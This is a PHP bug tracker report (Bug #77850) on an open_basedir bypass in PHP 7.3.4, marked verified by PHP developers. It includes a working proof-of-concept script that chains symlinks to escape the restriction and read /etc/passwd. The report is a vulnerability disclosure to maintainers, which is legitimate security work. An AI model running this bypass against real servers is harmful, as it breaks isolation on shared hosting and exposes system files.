php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #77850 Open_basedir bypass
Submitted: 2019-04-05 04:48 UTC Modified: 2019-06-18 05:47 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: simon dot vikstrom at gmail dot com Assigned:
Status: Verified Package: *Directory/Filesystem functions
PHP Version: 7.3.4 OS: Linux
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2019-04-05 04:48 UTC] simon dot vikstrom at gmail dot com
Description:
------------
Blaklis_ on twitter published a open_basedir bypass :

https://twitter.com/Blaklis_/status/1113866828739166208



Test script:
---------------
<?php

/*

I could recreat with:

mkdir -p /var/www/html
chmod -R YOURUSER:YOURUSER /var/www 
cd /var/www/html/
php  -d open_basedir=/var/www FILENAME.php

*/

mkdir('/var/www/html/a/b/c/d/e/f/g/',0777,TRUE);
symlink('/var/www/html/a/b/c/d/e/f/g','foo');
ini_set('open_basedir','/var/www/html:bar/');
symlink('foo/../../../../../../','bar');
unlink('foo');
symlink('/var/www/html/','foo');
echo file_get_contents('bar/etc/passwd');


Expected result:
----------------
file_get_contents(): open_basedir restriction in effect.  ....

Actual result:
--------------
Reads /etc/passwd

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-07 09:48 UTC] sjon@php.net
-Status: Open +Status: Verified
 [2019-05-07 09:48 UTC] sjon@php.net
I can confirm this issue - see https://3v4l.org/75AX0
 [2019-06-18 05:47 UTC] jhdxr@php.net
related discussion: https://externals.io/message/105606
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Thu Oct 17 18:01:26 2019 UTC